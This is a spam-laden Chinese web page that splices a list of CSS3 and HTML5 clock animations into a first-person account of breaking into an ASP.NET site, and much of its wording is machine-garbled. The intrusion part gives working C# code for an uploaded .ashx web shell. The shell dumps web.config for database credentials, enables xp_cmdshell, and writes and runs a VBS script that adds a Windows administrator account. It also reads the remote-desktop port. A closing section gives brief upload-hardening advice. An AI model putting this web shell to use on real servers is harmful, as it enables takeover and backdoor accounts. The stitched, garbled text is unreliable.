葡京在线开户ASP.NET网站入侵第二波(LeaRun.信息化快速开框架 已为作者拿下)

作者小学文化,语言组织能力不同,写的梗塞之地方要大家以就正在看,不喜欢不喷。

于网页上,特别是个人博客中不时会面为此到钟插件,一暂缓个性化的时钟插件不仅可被页面显示美丽,而且可以叫访客看到眼前的日子与日。今天我们受大家搜集了15个超强悍的圆盘时钟动画,很多还是冲CSS3,也起有使jQuery和SVG,让咱们一并来探视吧。

    上篇我说道了什么样以上传文件中犯服务器,這次我们多少多讲一点。

1、纯CSS3/SVG实现的带秒针表盘圆盘复古时钟

当今之网页上圆盘时钟越来越少见了,更多的凡数字时钟和数字日历。之前我们大饱眼福了有因jQuery和CSS3的圆盘时钟动画,比如纯CSS3
3D立体圆盘时钟动画和jQuery实现一个吊于墙上的圆盘时钟动画还分外不错。这次如果叫大家带来一样慢慢悠悠较复古的圆盘时钟,基于纯CSS3,盘面是SVG绘制而改为,并无利用外图片。时钟整体外观比较怀旧,给丁非同等的视觉感受。

葡京在线开户 1

在线演示 
  源码下载

   还是事先谈下流程:

2、HTML5 Canvas 3栽不同风格的圆盘时钟

这次咱们若连续为大家享用同悠悠基于HTML5 Canvas的圆盘时钟动画,和前分享的即款HTML5
Canvas
圆形时钟动画恍如,它吗是依据HTML5的,但是这款时钟提供了3栽不同的体制风格,而且时钟的轻重可以自己说了算。

葡京在线开户 2

在线演示 
  源码下载

1、上传代码页面  我上传的是ashx页面。

3、迷你可爱的jQuery/CSS3完美盘时钟

记忆以前和大家大饱眼福过好几款基于jQuery或者HTML5/CSS3的圆盘时钟动画插件,今天若是介绍的也罢是均等放缓基于jQuery和CSS3的简便圆盘时钟,它的特点是圆盘中央会发出一个生十分的数字,表示即凡几碰。

葡京在线开户 3

在线演示 
  源码下载

2、用ashx页面已文本形式显得web.Config的始末 得到数据库连接,

4、CSS3拉动数字时钟的创意圆盘时钟动画

前面几乎上我们刚刚为大家大快朵颐过相同暂缓基于SVG和CSS3的复古圆盘时钟,大家可以当这里查阅演示和这里下载源码。今天以要叫大家带来另外一舒缓CSS3宏观盘时钟,它的表征是圆盘对半分,一半著数字时钟信息,另一半凡半独圆盘时钟,样式设计及挺有创见。

葡京在线开户 4

在线演示 
  源码下载

3、用ashx在网站根本目录输出vbs脚本(创建Windows账户脚本)

5、HTML5 SVG圆盘时钟动画 5栽钟样式

今日咱们设来分享同款基于HTML5及SVG的圆盘时钟动画,首先,圆盘时钟的光阴是同您的地方时间同步的,因此,你了好据此她来看上网时间。另外,这款HTML5圆盘时钟提供了5饱受不同之盘面样式,有带动刻度的与未牵动刻度的,还格外实用的。

葡京在线开户 5

在线演示 
  源码下载

4、开启数据库的xp_cmdshell。

6、CSS3手表倒计时动画 可打定义主题皮肤

早段时光,我们为大家分享过部分比炫酷和实用的钟表手表插件,比如就款纯CSS3
3D立体圆盘时钟动画和HTML5仿Apple
Watch时钟动画,效果还挺不利。今天咱们只要采取CSS3来贯彻一个表样式的倒计时动画,功能相对比较简单,最充分之特性在于可切换4栽不同之主题皮肤。

葡京在线开户 6

在线演示 
  源码下载

5、利用数据库执行于网站到底目录输出vbs脚本。入侵就做到了

7、HTML5 Canvas环形数字时钟 精确到毫秒

前我们大饱眼福了很多死富有创意的jQuery时钟和HTML5钟,这次我们要享受的呢是同缓基于HTML5
Canvas的环形数字时钟,它的另外一个特征是可以确切到毫秒,环形指针也发发光的视觉效果。

葡京在线开户 7

在线演示 
  源码下载

ashx代码文件如下

8、jQuery实现一个高悬在墙上的圆盘时钟动画

今天咱们若让大家介绍一暂缓基于jQuery的圆盘时钟动画,首先时钟是可以对显示当前本土时间之,而且为可以就地方时间实时更新。其次这款时钟与前分享的HTML5仿Apple
Watch时钟动画差的凡,这个时钟呈现出挂于墙上的功用,看上去比短小和美丽。

葡京在线开户 8

在线演示 
  源码下载

葡京在线开户 9葡京在线开户 10

9、纯CSS3 3D立体圆盘时钟动画

我们既享受了许多美好的圆盘时钟动画了,有根据jQuery的,也发出根据HTML5和CSS3的,这个中也不乏SVG绘制的钟表动画。今天我们如果继续被大家享用另外一磨蹭基于纯CSS3的3D立体圆盘时钟,它与其它圆盘时钟不一致,并无得以读取本地时间,并且实时更新。另外一个表征是她的外观呈现出3D立体的视觉效果,看起老大。

葡京在线开户 11

在线演示 
  源码下载

/// <summary>
        /// 显示配置文件
        /// </summary>
        /// <param name="context"></param>
        public void ShowWebConfig(HttpContext context)
        {
            context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
        }
        /// <summary>
        /// 写vbs脚本
        /// </summary>
        /// <param name="context"></param>
        public void WriteVbs(HttpContext context)
        {
            System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\")\r\nos=\"WinNT://\"&wsnetwork.ComputerName\r\nSet ob=GetObject(os) '得到adsi接口,绑定\r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nSet od=ob.Create(\"user\",\"test\") '建立用户\r\nod.SetPassword \"1234\" '设置密码\r\nod.SetInfo '保存\r\nSet of=GetObject(os&\"/test\",user) '得到用户\r\noe.add os&\"/freeast\" \r\n");
        }
        /// <summary>
        /// 直线数据库
        /// </summary>
        /// <param name="connection"></param>
        /// <param name="sql"></param>
        public void ExecuteSql(string connection, string sql)
        {
            using (SqlConnection con = new SqlConnection(connection))
            {
                using (SqlCommand commd = new SqlCommand(sql, con))
                {
                    con.Open();
                    commd.ExecuteNonQuery();
                    con.Close();
                }
            }
        }
        /// <summary>
        /// 直线数据库并输出表格
        /// </summary>
        /// <param name="context"></param>
        /// <param name="connection"></param>
        /// <param name="sql"></param>
        public void ExecuteSql1(HttpContext context,string connection, string sql)
        {
            System.Data.DataTable table = new System.Data.DataTable();
            using (SqlConnection con = new SqlConnection(connection))
            {
                using (SqlCommand commd = new SqlCommand(sql, con))
                {
                    con.Open();
                    using (SqlDataAdapter ad = new SqlDataAdapter(commd))
                    {
                        ad.Fill(table);
                    }
                    con.Close();
                }
            }
            foreach (System.Data.DataRow row in table.Rows)
            {
                foreach (System.Data.DataColumn column in table.Columns)
                {
                    context.Response.Write(row[column]);
                    context.Response.Write("\t");
                }
                context.Response.Write("\r\n");
            }
        }
        /// <summary>
        /// 显示远程桌面端口
        /// </summary>
        /// <param name="context"></param>
        private void ShowPort(HttpContext context)
        {
            context.Response.Write(Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp").GetValue("PortNumber").ToString());
        }
        public void ProcessRequest(HttpContext context)
        {
            context.Response.ContentType = "text/plain";

            try
            {
                var connection = context.Request.QueryString["connection"];
                switch (context.Request.QueryString["method"])
                {
                    case "1": WriteVbs(context); break;
                    case "2":
                        ExecuteSql(connection,@"sp_configure 'show advanced options',1  reconfigure");
                        ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//开启数据库的xp_cmdshell
                        break;
                    case "3": ExecuteSql1(context, connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
                        break;
                    case "4": ShowPort(context); break;
                    default:
                        ShowWebConfig(context);
                        break;
                }
            }
            catch (Exception ex)
            {
                context.Response.Write(ex.Message);
            }
            context.Response.End();
        }
        public bool IsReusable
        {
            get
            {
                return false;
            }
        }

10、基于SVG的HTML5圆盘时钟动画

前少龙我们分享了千篇一律缓慢根据SVG的圆盘时钟,可以来例外的钟表盘面。今天我们设再来分享另外一悠悠基于SVG的HTML5圆盘时钟动画,和齐同一缓缓看似,这款HTML5时钟也能够确切获取当地的光阴,并且秒针、分针、时针可以走,效果还不错。

葡京在线开户 12

在线演示 
  源码下载

View Code

11、15单超过绚丽的HTML5 Canvas时钟动画特效

之前我们来吃大家介绍了众多冲HTML5的时钟动画,比如就款5栽体制的HTML5
SVG圆盘时钟动画和HTML5仿Apple
Watch时钟动画,效果都深挺。这次如果享用的是15个过绚丽之HTML5
Canvas时钟动画特效,它们多都起个别不同之外观,有几乎独时钟的形态还特别新颖奇特,因为凡根据HTML5
Canvas的,所以您的浏览器需要支持HTML5。

葡京在线开户 13

在线演示 
  源码下载

 

12、jQuery/CSS3带来数字时钟的圆盘时钟

之前我们大饱眼福过众多冲jQuery和CSS3的钟表插件了,有数字时钟,今天要是介绍的这款时钟插件是数字时钟和圆盘时钟的混合,也就是是以圆盘时钟上搭了一个数字时钟,更加美妙及实用。

葡京在线开户 14

在线演示 
  源码下载

這里我们因为 “LeaRun.信息化快速支付框架”的在线按钮为例

13、可爱的CSS3圆满盘时钟动画

前面我们分享了部分根据CSS3和jQuery的圆盘时钟,比如纯CSS3兑现圆盘时钟动画和HTML5/CSS3时尚之圆盘时钟动画。今天要分享的呢是同样款可爱的CSS3健全盘时钟动画,时钟背景是乳白色的,显得挺彻底,另外,时钟也得同你本地的时候保持同步。

葡京在线开户 15

在线演示 
  源码下载

上传文件我哪怕不说了,上篇有人以咨询我怎么亮web.Config的始末,我这边具体贴下代码
其实很简短,File.ReadAllText  web.config文件就得了

14、纯CSS3贯彻圆盘时钟动画

记之前分享过相同款因SVG的HTML5圆盘时钟动画,效果还大好之,今天咱们延续为大家大饱眼福同慢性又怪的纯CSS3实现的圆盘时钟动画,这款时钟动画在初始化的时候就闹动画特效,包括圆盘的朝三暮四,还有时钟指针的变异,都给以了异常可怜的卡通色彩。

葡京在线开户 16

在线演示 
  源码下载

public void ShowWebConfig(HttpContext context)
        {
            context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
        }

15、HTML5 Canvas 圆形时钟动画

近来咱们刚刚也大家大饱眼福了同样迟迟好是的jQuery/CSS3拉动数字时钟的圆盘时钟,效果挺不利。今天我们如果继续为大家介绍另外一个冲HTML5 Canvas的周时钟动画。它的机能非常简单,就是一个略的时钟,时针分针和秒针的水彩各不相同。

葡京在线开户 17

在线演示 
  源码下载

如上就是15独超强悍的CSS3周盘时钟动画,欢迎收藏分享。转载请注明原文链接:http://www.html5tricks.com/15-cool-css3-circle-clock.html

运作后直线ashx 得到数据库连接,如图

葡京在线开户 18

 

从就是是创立Windows账户的本子

葡京在线开户 19葡京在线开户 20

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","test") '建立用户
od.SetPassword "1234" '设置密码
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到用户
oe.add os&"/freeast" 

View Code

 

然后被数据库的xp_cmdshell。

sp_configure 'show advanced options',1  reconfigure

Go

sp_configure 'xp_cmdshell',1 reconfigure

当最后执行vbs脚本

exec master..xp_cmdshell 'cscript 脚本文件目录"'

运行结果如下:

葡京在线开户 21

好 这证明直线成功了。。。。 也就是是服务器用户增长成功了

 

今昔如从头远程桌面了,于是单端口扫描工具发现3389是关之,于是断定肯定是修改了端口后,于是便加了个代码,让程序去读取远程桌面端口,

代码如下:

/// <summary>
        /// 显示远程桌面端口
        /// </summary>
        /// <param name="context"></param>
        private void ShowPort(HttpContext context)
        {
            context.Response.Write(Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp").GetValue("PortNumber").ToString());
        }

好了 到這里 一切的完成了 ,打开远程桌面连接吧。。

葡京在线开户 22

 

为此次公开还从未赶趟通知  事主
于是自己帮事主把这漏洞补及了晚才发出去的,所以你们吗休想去试试了  
-.-!!!!

然后自己于的话说补救的方,我就是概括介绍几栽了

1、将上传的文书放到网站外,也就是说 让iit读博不至(但记得分配权限)
,如:假如自己网站在 d:\\Web\Oa\ 
这个是自己网站的同目录,那么我上传的文件 可以放置 d:\File\OA
里面,别人就是无克直接访问

2、就是在上传文件的目下新确立个web.config
把持有请求都不容,(C#举凡可以读取的,只是要为此Response.WriteFile 输出)

3、全部抽

。。。。。。。。。。。。。。。。

 

好了 ,大家赶紧把之前的类型整理一全勤吧,把能加之续及。。。。
千万别用這些漏洞去举行坏事哦  ,。。。
那样你晤面让请去喝茶的。。。。-.-!!!!!